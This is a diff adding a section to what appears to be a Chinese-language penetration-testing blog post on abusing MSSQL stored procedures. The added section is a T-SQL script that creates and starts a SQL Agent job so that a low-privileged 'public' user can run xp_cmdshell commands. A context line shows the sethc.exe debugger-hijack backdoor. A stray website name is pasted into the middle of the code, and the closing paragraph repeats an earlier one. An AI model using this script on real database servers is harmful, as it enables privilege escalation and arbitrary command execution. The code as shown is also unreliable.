--- a/_posts/2024-08-04-mssql.md
+++ b/_posts/2024-08-04-mssql.md
@@ -608,3 +608,30 @@ Options\sethc.EXE','Debugger','REG_SZ','C:\WINDOWS\explorer.exe';
 ```
 
 mssql众多的储存过程是我们利用的关键，还有很多可能没被提出，需要自己的发现，比如在遇到iis6的拿不了shell还有个上传可以跳目录，不妨试试xp_create_subdir建立个畸形目录解析。
+
+
+
+#### 5. pulic
+
+这种pulic提权 实际情况也很少吧,也是提一下了
+
+```mssql
+USE msdb
+EXEC sp_add_job @job_name = 'GetSystemOnSQL', www.2cto.com
+@enabled = 1,
+@description = 'This will give a low privileged user access to
+xp_cmdshell',
+@delete_level = 1
+EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
+@step_name = 'Exec my sql',
+@subsystem = 'TSQL',
+@command = 'exec master..xp_execresultset N''select ''''exec
+master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''
+EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
+@server_name = 'SERVER_NAME'
+EXEC sp_start_job @job_name = 'GetSystemOnSQL'
+```
+
+
+
+mssql众多的储存过程是我们利用的关键 当然还有很多可能没被提出，需要自己的发现，比如在遇到iis6的拿不了shell还有个上传可以跳目录，不妨试试xp_create_subdir 建立个畸形目录解析。
